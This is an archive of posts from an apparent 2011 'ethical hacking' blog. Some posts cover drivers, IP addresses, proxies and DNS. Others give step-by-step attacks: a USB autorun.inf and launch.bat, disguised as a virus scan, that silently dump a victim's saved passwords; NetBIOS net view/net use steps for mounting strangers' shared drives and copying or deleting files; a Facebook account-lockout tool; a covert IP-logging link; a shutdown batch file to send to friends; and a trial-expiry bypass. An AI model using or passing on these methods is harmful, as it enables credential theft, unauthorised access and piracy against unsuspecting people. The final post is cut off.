Realtek AC'97 Drivers A4.06

Posted by MUKESH KUMAR on 8 Jul 2011

This driver supports all ALC series audio chipsets from ALC101 up to ALC861. It is used as onboard sound on many motherboards. Chips covered include ALC101 /201/ 202/ 203/ 250/ 650/ 653/ 655/ 658/ 861.

The package includes: Driver/Application Setup Program; RtlRack for Win98/Me/2000/XP and AvRack for Win95/NT4; Realtek Sound Effect Manager.

Windows 98Gold/98se/Me/2000/XP/2003(32/64 bits) for Driver only. For Windows 98 SE, DirectX(R)8 is required to enable advanced features.

This is a general audio Realtek driver and may not offer the customizations made by your system/motherboard manufacturer. To be sure you obtain the full features/customizations provided in your original audio product, please download the latest drivers from your system/motherboard manufacturer's website
Download Here
More aboutRealtek AC'97 Drivers A4.06

WELOME TO THE WORLD OF ETHICAL HACKING

Posted by MUKESH KUMAR on 5 Jul 2011

Here is the list of all the the lattest stuffs added to the site:-


HACK PASSWORD USING PENDRIVE:

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE ,chrome and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff /hack passwords from any computer....read more..

 DETECT ANONYMOUS IP ADDRESS:
Today there are several means for the internet criminal's to expand their criminal activities and the internet is the way where today we have the maximum no. of crimes. There are several ways through which the hackers are spoofing their ip address and they do their criminal activities silencly..:|...but even the person's need to be one step ahead to jerk their aims by detecting their fake ip address.However proxies are more widely used by online fraudsters to engage in cyber crimes since it is the easiest way to hide their actual Geo-location such as city/country through a spoofed IP address. Following are some of the examples where fraudsters use the proxies to hide their actual IP.....read more...

 It has been already disscussed here how to know the ip address of a remote computer. Once you obtain this IP address it .is possible to access the computer files through its ip and you and also do many more activities on thier computer by just knowing their ip address..
Just go to http://www.ip-adress.com/ip_tracer/ and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address...read more..


 MORE STUFFS GIVEN TO THEIR SECTIONS..
More aboutWELOME TO THE WORLD OF ETHICAL HACKING

DETECT ANONYMPUS IP ADDRESS

Posted by MUKESH KUMAR on 4 Jul 2011

 DETECT ANONYMOUS IP ADDRESS:
Today there are several means for the internet criminal's to expand their criminal activities and the internet is the way where today we have the maximum no. of crimes. There are several ways through which the hackers are spoofing their ip address and they do their criminal activities silencly..:|...but even the person's need to be one step ahead to jerk their aims by detecting their fake ip address.However proxies are more widely used by online fraudsters to engage in cyber crimes since it is the easiest way to hide their actual Geo-location such as city/country through a spoofed IP address. Following are some of the examples where fraudsters use the proxies to hide their actual IP.

While ip spoofing has got some of the advantages while some of the disadvantages:-

Site Restriction(ad): sometimes it usually happens to us that our login to some of the social networking sites such as facebook or orkut has been restricted in other words our ip gets banned from accessing the sites due to some of the unusual activity on the sites..In these cases we use to hide our ip address and we use another ip address and can gain access to those blockesd sites..:)

Frauds(disad): Sometimes some of the thief stolen any data from the computer and tries to acces some of the sites which are benned in their region or country then those thief use the ip spoofing to change their ip address and do complete their jobs...:(

Proxy Detection Services

 
So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the usage of proxy or spoofed IP from users participating online.
Proxy Detection web services allow instant detection of anonymous IP addresses. Even though the use of proxy address by users is not a direct indication of fraudulent behaviour, it can often indicate the intention of the user to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.
 
How Proxy Detection Works?
Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm it’s authenticity.
The proxy detection services on the other hand compare this IP against a known list of flagged IPs that belong to proxy services. If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy. These proxy detection services work continuously to grab a list or range of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.
 
How to Tell Whether a given IP is Real or a Proxy?
There are a few free sites that help you determine whether or not a given IP is a proxy. You can use free services like WhatisMyIPAddress to detect proxy IPs. Just enter the suspected IP in the field and click on “Lookup IP Address” button to check the IP address. If it is a suspected proxy then you will see the results something as follows.
Detect Anonymous Proxy
So for all those who think that they can escape by using a spoofed IP, this post is the answer. I hope this information helps. Pass your comments.

More aboutDETECT ANONYMPUS IP ADDRESS

TRACE IP ADDRESS

Posted by MUKESH KUMAR


TRACE IP ADDRESS
 It has been already disscussed here how to know the ip address of a remote computer. Once you obtain this IP address it .is possible to access the computer files through its ip and you and also do many more activities on thier computer by just knowing their ip address..
Just go to http://www.ip-adress.com/ip_tracer/ and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.
1. Country in which the IP is located
2. Region
3. City
4. Latitude/Longitude
5. Zip Code
6. Time Zone
7. Name of the ISP
8. Internet Speed
9. Weather Station
10. Area Code and
11. Domain name associated with the IP address.
A sample snapshot of the results from site is as
223.176.189.18 located in India





my ip IP Tracing and IP Tracking (223.176.189.18)
Examples: 213.86.83.116 (IP address) or google.com (Website)
223.176.189.18 IP address location & more:
My IP address [?]: 223.176.189.18 [Whois] [Reverse IP]
My IP country code: IN
My IP address country: ip address flag India
My IP address state: maharastra
My IP address city: mumbai
My IP address latitude: 20.0000
My IP address longitude: 77.0000
My ISP [?]: Bharti Airtel Limited
My Proxy: None / Highly Anonymous
Organization: Bharti Airtel Limited
 
More about my IP and my system:
My Speed: Unknown [Speedtest]
My Browser [?]: Mozilla FireFox 5.0
My Operating System [?]: windows -7 os

you can just trace the ip address of the computer very easily using these sites, this is not only the site in the internet but there are many you can simply google all the sites and with the premium subscription you can add more feature to your site ....
so the location is few clicks away...:)
More aboutTRACE IP ADDRESS

NETBIOS IP HACKING

Posted by MUKESH KUMAR

NETBIOS HACKING:-
THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.
STEP-BY-STEP NETBIOS HACKING PROCEDURE
1.Open command prompt
2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
Example: C:\>net view \\219.64.55.112
The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.
3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint
NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.
NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.
4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.
NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP. 
please note that it is onlly for educational purpose...we are not liable for any illigal use
REPLY IN COMMENTS:>>>
More aboutNETBIOS IP HACKING

Hack Password Using Pendrive

Posted by MUKESH KUMAR

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE ,chrome and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff /hack passwords from any computer.


Things We Need:-

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

ChromePass : It is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.



Download :-


I have uploaded all  the Hacking tools in a single package click on the download button to download the all the tools and to get the password click Here 


How to Hack Passwords Using An USB Drive:-

1. After downloading  all the tools, from the above link extract and copy all the executable(.exe files) which is inside the "USB pass hack" folder  into your USB- Pendrive.

2. Now open a Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from New Text Document.txt to autorun.inf ,Now copy the autorun.inf file onto your USB pen drive.

3. Now open an another Notepad and copy  the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

start ChromePass.exe /stext chrome.txt


Now save the file as launch.bat ,Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff /hack the passwords. You can use this pen-drive on any computer to sniff the stored passwords. Just follow the steps given below

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. as  shown ,open the files to view the stored passwords
This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

If you have any doubts regarding the hack please pass your comments for further doubts and clarifications 
More aboutHack Password Using Pendrive

Hack facebook with Facebook Freezer

Posted by MUKESH KUMAR

Yesterday when i was surfing on the net i came across an interesting script kidy tool Facebook Freezer  Actually this tool is not used for hacking Facebook but it is simply used to prevent users from logging into Facebook sounds cool ? ha . Follow the instructions given below to prevent your friends , from logging into their Facebook account


Concept Behind The Hack  :-
Facebook has a security feature in which after 25 or so logins the account is temporarily disabled,to enable the account the account owner must reset his/her account
Thus, even when victim tries to login his Facebook account using correct password, he is not able to login to his Facebook account, thus you can hack Facebook account thanks to Facebook Freezer.



Hack Facebook Accounts With Facebook Freezer :-


1. Frist a fall  Download Facebook Freezer from Here , and to get the password click Here


2. Now extract the files into a folder 
  
3. Now  run Facebook Freezer.exe file  as shown



4. Now enter the email id of  the victim whose Facebook account you want to hack using Facebook freezer and finally hit "Freeze".


5. That's it. You will now be able to hack Facebook account using this Facebook freezer. This freezing will continue until you hit "Stop Freezing".This will not hack facebook account for you but it will prevent the victim from logging into his ,her account,


Note :- If you want to hack Your friends Facebook Password .You can have a look at my article  How to hack Facebook account using a phisher


For futher doubts and clarifications please pass your comments:-
More aboutHack facebook with Facebook Freezer

Free Fast DNS Service list | get fast internet thorough dns

Posted by MUKESH KUMAR on 3 Jul 2011

Free Fast Public DNS Servers List

The most basic task of DNS is to translate hostnames such as theos.in to IP address such as 74.86.49.131. In very simple terms, it can be compared to a phone book. DNS also has other important use such as email routing.
This is my list of better, fast public dns servers and free dns server (as compare to your ISP / DSL / ADSL / cable DNS service providers dns servers). These dns servers are free to all. I was able to improve my browsing speed with following DNS servers. Use any one of the following provider.

Free Public DNS Server

=> Service provider: Google
Google public dns server IP address:
  • 8.8.8.8
  • 8.8.4.4
=> Service provider:Dnsadvantage
Dnsadvantage free dns server list:
  • 156.154.70.1
  • 156.154.71.1
=> Service provider:OpenDNS
OpenDNS free dns server list / IP address:
  • 208.67.222.222
  • 208.67.220.220
=> Service provider:Norton
Norton free dns server list / IP address:
  • 198.153.192.1
  • 198.153.194.1
=> Service provider: GTEI DNS (now Verizon)
Public Name server IP address:
  • 4.2.2.1
  • 4.2.2.2
  • 4.2.2.3
  • 4.2.2.4
  • 4.2.2.5
  • 4.2.2.6
=> Service provider: ScrubIt
Public dns server address:
  • 67.138.54.100
  • 207.225.209.66

How do I change or setup DNS server IP address?

Visit below mentioned site to setup DNS as per your operating system:
More aboutFree Fast DNS Service list | get fast internet thorough dns

WHAT ARE IP ADDRESSES

Posted by MUKESH KUMAR

What are IP Addresses


An IP address (Internet Protocol address) is a unique address that certain electronic devices currently use in order to identify and communicate with each other on a computer network utilizing the Internet Protocol standard (IP)—in simpler terms, a computer address.
Any participating network device—including routers, switches, computers, infrastructure servers (e.g., NTP, DNS, DHCP, SNMP, etc.), printers, Internet fax machines, and some telephones—can have its own address that is unique within the scope of the specific network. Some IP addresses are intended to be unique within the scope of the global Internet, while others need to be unique only within the scope of an enterprise.
The IP address acts as a locator for one IP device to find another and interact with it. It is not intended, however, to act as an identifier that always uniquely identifies a particular device. In current practice, an IP address is less likely to be an identifier, due to technologies such as Dynamic assignment and Network address translation.
More aboutWHAT ARE IP ADDRESSES

WEB PROXIES

Posted by MUKESH KUMAR

Web Proxies


In computer networks, a proxy server is a server (a computer system or an application program) which services the requests of its clients by forwarding requests to other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server provides the resource by connecting to the specified server and requesting the service on behalf of the client.
A proxy server may optionally alter the client’s request or the server’s response, and sometimes it may serve the request without contacting the specified server. In this case, it would ‘cache’ the first request to the remote server, so it could save the information for later, and make everything as fast as possible.
A proxy server that passes all requests and replies unmodified is usually called a gateway or sometimes tunneling proxy.
A proxy server can be placed in the user’s local computer or at specific key points between the user and the destination servers or the Internet.
 

Caching proxy server

 
A proxy server can service requests without contacting the specified server, by retrieving content saved from a previous request, made by the same client or even other clients. This is called caching. Caching proxies keep local copies of frequently requested resources, allowing large organizations and Internet Service Providers to significantly reduce their upstream bandwidth usage and cost, while significantly increasing performance. There are well-defined rules for caching. Some poorly-implemented caching proxies have had downsides (e.g., an inability to use user authentication). Some problems are described in RFC 3143 (Known HTTP Proxy/Caching Problems).
 

Web proxy

 
Proxies that focus on WWW traffic are called web proxies. Many web proxies attempt to block offensive web content. Other web proxies reformat web pages for a specific purpose or audience (e.g., cell phones and PDAs)
Access control: Some proxy servers implement a logon requirement. In large organizations, authorized users must log on to gain access to the ‘WWW.’ . The organization can thereby track usage to individuals.
 

Anonymizing proxy server

 
A proxy server that removes identifying information from the client’s requests for the purpose of anonymity is called an anonymizing proxy server or anonymizer.
 

Transparent and non-transparent proxy server

 
The term “transparent proxy” is most often used incorrectly to mean “intercepting proxy” (because the client does not need to configure a proxy and cannot directly detect that its requests are being proxied).
However, RFC 2616 (Hypertext Transfer Protocol — HTTP/1.1) offers different definitions:
“A ‘transparent proxy’ is a proxy that does not modify the request or response beyond what is required for proxy authentication and identification.”
“A ‘non-transparent proxy’ is a proxy that modifies the request or response in order to provide some added service to the user agent, such as group annotation services, media type transformation, protocol reduction, or anonymity filtering.”
More aboutWEB PROXIES

CHANGE IP ADDRESS

Posted by MUKESH KUMAR

Change IP Address

Submitted by Srikanth on Tuesday, 12 August 200830 Comments
How to change your IP address in less than a minute? The following trick gives you a step-by-step procedure to change your IP address. 
 
 
 
 
1. Click on “Start” in the bottom left hand corner of screen.
2. Click on “Run”.
3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.
4. Type “ipconfig /release” just like that, and hit “enter”.
5. Type “exit” and leave the prompt.
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”.
You should now be on a screen with something titled “Local Area Connection”, or something close to that.
8. Right click on “Local Area Connection” and click “properties”.
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.
10. Click on “Use the following IP address” under the “General” tab.
11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.
13. Hit the “Ok” button here.
14. Hit the “Ok” button again. You should now be back to the “Local Area Connection” screen.
15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings.
17. This time, select “Obtain an IP address automatically”.
18. Hit “Ok”.
19. Hit “Ok” again.
20. You now have a new IP address.
Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack. In this case you need to switch off the modem and then switch it on to get the new IP address.
NOTE: All these tricks works only if you have a dynamic IP address. But if you have a static IP address you have no option to change your IP.
More aboutCHANGE IP ADDRESS

HIDE IP ADDRESS OF YOUR COMPUTER

Posted by MUKESH KUMAR

How to Hide Your IP Address


Hide IP AddressEvery time your computer is connected to the Internet, it is assigned a public IP address which is used to uniquely identify your computer. Wherever you visit websites or use Internet services, your public IP is also transmetted and recorded in the logs kept on those servers. Thus, your IP address makes it possible to trace all your web activities back to you.
 

So, How do I Hide my IP Address?

 
The best and the easiest way to hide your IP address is by using a proxy server (anonymous proxy server) in one form or the other. A proxy server is a special type of server which acts as an intermediary between your home computer (or network) and rest of the Internet. This proxy server makes requests for Internet services/information on behalf of your computer using it’s own IP address instead of yours. The obtained information is then passed on to your computer. Thus, your computer is indirectly connected to the Internet via a proxy server where the IP address of the proxy server is exposed and your actual IP address remains concealed. Web proxies are identified by a combination of URL and TCP port number which is similar to something as below:
http://207.133.133.205:35
In the above example, http://207.133.133.205 is the URL of the proxy server and 35 is the port number. There are a variety of these proxy servers available:
 
Transparent Proxy Server
This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used to speed-up the web browsing since thay have a very good ability to cache websites. But they do not conceal the IP of it’s users. It is widely known as transparent proxy because it will expose your real IP address to the outside world. This type of proxy server will not hide your IP address.
 
Anonymous Proxy Server
This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. Anonymous proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.
 
Distorting Proxy Server
A Distorting proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.
 
High Anonymity Proxy Server (Elite Proxy)
An Elite proxy server does not identify itself as a proxy server and will not make the original IP address available to the outside world. This type of proxy server will hide your IP address.
 

Which Proxy is the Best?

 
Clearly High Anonymity Proxy (Elite Proxy) is the best to hide your IP address. Because of it’s nature, the elite proxy neither identifies itself as a proxy server nor will expose your real IP address to the Internet. Hence, it provides maximum privacy for your Internet activities.
You can obtain a long list of proxy server URLs on Google and configure your browser settings so as to make them working for you. However, most of the free proxy servers you get on the Internet will not be effective in concealing your IP address. Even if some of them work they will be too slow and may take several minutes for a single webpage to load.
So, in order to connect to a blazing fast elite proxy server, I recommend you to use the following IP Hiding software:
Hide the IP (Tested)
 
Hide the IP will put you behind a blazing fast Elite Proxy Server(High Anonymous Proxy) with just a click of a button. With this program, you need not worry about configuring your browser settings.
All you have to do is just install the program and select the proxy server you want to be behind. It offers a list of countries from which you can decide which country to be indicated as your origin.
 

How to ensure that the IP is hidden?

 
Before you hide your IP address, you can check your real IP by visiting the following website:
Once you get your real IP, switch on your IP hiding software. Now once again visit the above site and check your IP address. If you see a new IP then this means that your software is doing the right job.
Also, the above site (Whatismyipaddress.com) is capable of detecting many proxies. If you see the words such as “suspected proxy server or network sharing device” or similar words then, it means that the proxy you are using is not an Elite Proxy.
Download Hide the IP now and see the difference for yourself. For more information on this product, visit Hide the IP homepage from the following link:
Hide the IP (Download Link)
More aboutHIDE IP ADDRESS OF YOUR COMPUTER

HOW TO FIND IP ADDRESS OF A REMOTE COMPUTER

Posted by MUKESH KUMAR

How to Find the IP Address of a Remote Computer

Find IP AddressMost of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.

I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.
1. Download the IP Finder script (IP_Finder.ZIP) that I have created.
2. Open a new account in X10Hosting (or any free host that supports PHP).
3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.
4. You can rename the ip.php to any name of your choice.
5. Set the permission to 777 on ip_log.txt.
Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.
For your better understanding let’s take up the following example.
Suppose you open a new account in X10hosting.com with the subdomain as abc, then your IP Finder link would be
http://abc.x10hosting.com/ip.php
You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.
To find the recorded IP address check the logs using the following link.
http://abc.x10hosting.com/ip_log.php
The sample log will be in the following format
79.92.144.237 Thursday 07th of May 2009 05:31:27 PM
59.45.144.237 Thursday 07th of May 2009 05:31:28 PM
123.92.144.237 Thursday 07th of May 2009 05:31:31 PM
NOTE: You have to replace abc with your subdomain name. 

and that's all just keep on enjoying...:)
More aboutHOW TO FIND IP ADDRESS OF A REMOTE COMPUTER

Posted by MUKESH KUMAR

What are Private and Public IP Addresses

Private and Public IP AddressesInternet Protocol (IP) addresses are usually of two types: Public and Private. If you have ever wondered to know what is the difference between a public and a private IP address, then you are at the right place. In this post I will try to explain the difference between a public and a private IP addres in layman’s terms so that it becomes simple and easy to understand.
 

What are Public IP Addresses?

A public IP address is assigned to every computer that connects to the Internet where each IP is unique. Hence there cannot exist two computers with the same public IP address all over the Internet. This addressing scheme makes it possible for the computers to “find each other” online and exchange information. User has no control over the IP address (public) that is assigned to the computer. The public IP address is assigned to the computer by the Internet Service Provider as soon as the computer is connected to the Internet gateway.
A public IP address can be either static or dynamic. A static public IP address does not change and is used primarily for hosting webpages or services on the Internet. On the other hand a dynamic public IP address is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer which goes off when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.
You can check your public IP address by visiting www.whatismyip.com
 

What are Private IP Addresses?

An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):

10.0.0.0 – 10.255.255.255 (Total Addresses: 16,777,216)
172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)
192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)
Private IP addresses are used for numbering the computers in a private network including home, school and business LANs in airports and hotels which makes it possible for the computers in the network to communicate with each other. Say for example, if a network X consists of 10 computers each of them can be given an IP starting from 192.168.1.1 to 192.168.1.10. Unlike the public IP, the administrator of the private network is free to assign an IP address of his own choice (provided the IP number falls in the private IP address range as mentioned above).
Devices with private IP addresses cannot connect directly to the Internet. Likewise, computers outside the local network cannot connect directly to a device with a private IP. It is possible to interconnect two private networks with the help of a router or a similar device that supports Network Address Translation.
If the private network is connected to the Internet (through an Internet connection via ISP) then each computer will have a private IP as well as a public IP. Private IP is used for communication within the network where as the public IP is used for communication over the Internet. Most Internet users with a DSL/ADSL connection will have both a private as well as a public IP.
You can know your private IP by typing ipconfig command in the command prompt. The number that you see against “IPV4 Address:” is your private IP which in most cases will be 192.168.1.1 or 192.168.1.2. Unlike the public IP, private IP addresses are always static in nature.
Unlike what most people assume, a private IP is neither the one which is impossible to trace (just like the private telephone number) nor the one reserved for stealth Internet usage. In reality there is no public IP address that is impossible to trace since the protocol itself is designed for transparency.
More about

How To Make Money Online, Understanding CPM Vs CPC

Posted by MUKESH KUMAR on 2 Jul 2011


Make MoneyIf you have ever tried to earn some revenue from your blog or websites then chances are that you have already come across the words like CPC,CPM andCPA. Online Advertising is growing very fast and every one is after a share of this advertisement revenue pie.To make sure that you get the best out of your investment it’s quite necessary that you are well aware of various forms of online advertisements.

What are CPM Ads ?

CPM

The Cost-per-thousand-impressions or Cost-per-Mile (CPM) is the amount an advertiser pays for every 1000 times a user views his/her ad and an impression is recorded.Since both Cost-Per-Click(CPC) and CPM Ads compete with each other in a bid advertisers will need to bid a higher CPM than the existing CPC ads in order to show.
to understand it better say you get 5ooo visitors daily on your blog, if you display two CPM Ad-units and lets say each has a bid for $1 and 2$ per 1000 impressions then your daily earnings will be a total of  $15 per day $5 from the first advertiser(at $1/1000 impression) and $10 from the second(at $2/1000 impression).

What are CPC Ads ?

cost-per-click

CPC stands for Cost Per Click.CPC is also known as Pay per click (PPC) In this Advertisement module you get paid for each click an affiliate ad receives. Google Adsense serves CPC ads for most of the time.Advertisers have to bid for keywords and depending on that is decided the Cost Per Click, thus an advertiser may pay a few cents to may be few dollars for each click.

What are CPA Ads ?

CPACPA or Cost Per Action/Acquisition is an advertising module in which the publisher takes all the risk of running the ad, and the advertiser pays only for the amount of users who complete a transaction, such as a purchase or sign-up. Google affiliate network, eBay,Amazon fall under this category.

So which one gives the maximum revenue ?

CPC is nowadays the most popular Revenue model these days and the reason is quite clear that it shares the risk between the publisher and the advertiser.The one problem with cost-per-click type ads is that they’re subject to click fraud.And that is the reason why Google Adsense and Yahoo have laid down very strict rules regarding accepting publishers account. However you must decide the kind of revenue model based on the content and visitors of your website or blog.
More aboutHow To Make Money Online, Understanding CPM Vs CPC

Shutdown your friend’s computer using a batch file

Posted by MUKESH KUMAR on 1 Jul 2011


What are batch files:
Batch files are files that allow MS-DOS and Microsoft Windows users to create a lists of commands and/or programs to run once the batch file has been executed. For example, a batch file could be used to run frequently run commands, deleting a series of files, moving files, etc. A simple batch file does not require any special programming skills and can be done by users who only know DOS commands.
A good example of a batch file for someone who is more familiar with Windows or the MacOS is to think of a batch file as a shortcut in Windows or an icon on the MacOS. Much like a shortcut, batch files could be used to run one or more commands and/or programs through the command line.
Another example of a very well known batch file is the autoexec.bat, which is a simple boot file loaded each time the computer is loaded on MS-DOS and early Windows computers. This batch file contained all the necessary commands and programs used to run MS-DOS and Windows each time the computer booted.

How to use batch file to shut down your friends comp:
The command to shut down the computer from command prompt is “shutdown –s –t XXXX” where X is the time in seconds after which the computer shuts down. To turn off your friends comp just create a batch file with this command and send it to your friend via gtalk or yahoo messenger. When he opens the file then shut down process starts.
How to create batch files:
Creating batch files is very easy just open the note pad and type in the commands you want to be executed (each in a new line) and save it as “filename.bat” while saving the file make sure that you select “save as type= all files”
Some DOS Commands:
To change a users password: net user username new passwd
Example: To set the password of Satish as geniushackers the command would be
Net user Mukesh geniushacker
……..some more to be added soon
Some screen shots for better understanding:
Creating a batch file for windows shut down
More aboutShutdown your friend’s computer using a batch file

Use Trial Version software forever

Posted by MUKESH KUMAR


Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.
Time Stopper : use Trial Version software forever without Expiration
Time Stopper : use Trial Version software forever without Expiration
Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.

How it Works

  • Open Time Stopper
  • Browse and select .exe of required trial software
  • Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
  • Choose any time
  • Click open software on your selected date
If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.
Size: 844 KB

Download Time Stopper


More aboutUse Trial Version software forever

Bluetooth Intrusion Demystified

Posted by MUKESH KUMAR


This manual aims at enabling all people know the Pandora’s box in their very own pocket and know how it works! Mobile Phone Bluetooth enabled
